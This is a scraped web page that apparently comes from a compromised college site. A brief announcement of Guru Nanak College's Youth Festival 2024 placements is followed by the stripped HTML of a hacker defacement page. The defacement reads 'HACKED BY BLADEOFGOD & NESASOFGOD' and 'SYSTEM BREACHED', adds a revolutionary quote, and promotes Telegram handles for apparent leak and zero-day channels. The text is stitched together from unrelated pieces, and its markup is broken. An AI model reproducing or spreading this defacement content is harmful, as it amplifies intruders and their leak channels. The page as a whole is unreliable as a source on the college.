Guru Nanak College has made us proud by securing the 1st position in the Zonal Level and the 3rd position in the Inter-Zonal Level of the prestigious Youth Festival 2024. Demonstrating exceptional talent and teamwork, the college participated in 31 events at the Zonal Level and achieved positions in every single one of them. This remarkable feat highlights the dedication, creativity, and hard work of our students and faculty.
© !DOCTYPE html html lang="tr" head meta charset="UTF-8" meta name="viewport" content="width=device-width, initial-scale=1.0" titleHACKED/title link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet" style * { margin: 0; padding: 0; box-sizing: border-box; } body { background: #000; color: #fff; font-family: 'Share Tech Mono', monospace; display: flex; justify-content: center; align-items: center; min-height: 100vh; text-align: center; overflow-x: hidden; } .container { max-width: 900px; padding: 20px; width: 100%; } /* RESİM AYARLARI */ .image img { width: 100%; max-width: 600px; height: auto; margin-bottom: 20px; border: 2px solid #111; box-shadow: 0 0 20px rgba(255, 0, 0, 0.2); } /* Başlık glitch efekti */ .title { font-size: clamp(24px, 5vw, 38px); color: #fff; position: relative; animation: glitch 1s infinite; font-weight: bold; text-transform: uppercase; } @keyframes glitch { 0% { text-shadow: 2px 0 red; } 50% { text-shadow: -2px 0 blue; } 100% { text-shadow: 2px 0 red; } } .red-line { color: #ff0000; font-size: 24px; margin: 20px 0; text-shadow: 0 0 10px red; letter-spacing: 5px; } /* Yazı ve Çeviri */ .quote { color: #ccc; margin: 20px 0; line-height: 1.6; font-size: 18px; } .translation { display: block; margin-top: 15px; font-size: 16px; color: #888; font-style: italic; } /* Footer */ .footer { margin-top: 30px; color: #ff0000; text-shadow: 0 0 10px red; font-size: 18px; cursor: pointer; } .footer:hover { color: #fff; transition: 0.3s; } /style /head body class="home wp-singular page-template-default page wp-embed-responsive wp-theme-twentytwentyfive" div class="wp-site-blocks" div class="container" div class="image" img src="https://www.yenimesaj.com.tr/resimler/haberler/29/turk-hackerlar-yunan-bakanliginin-sitesini-hackledi-H1350875-11.jpg" alt="Türk hackerlar Yunan bakanlığının sitesini hackledi" /div div class="title"HACKED BY BLADEOFGOD & NESASOFGOD/div div class="red-line"SYSTEM BREACHED/div div class="quote" “Unless the system changes, unless there is a revolution,br we will continue to move against everything placed before us…” span class="translation" “Sistem değişmedikçe, bir devrim gerçekleşmedikçe,br önümüze çıkan her şeye karşı hareket etmeye devam edeceğiz…” /span /div div class="footer" t.me/Nesas_0day | t.me/bladleaks /div /div /div /body /html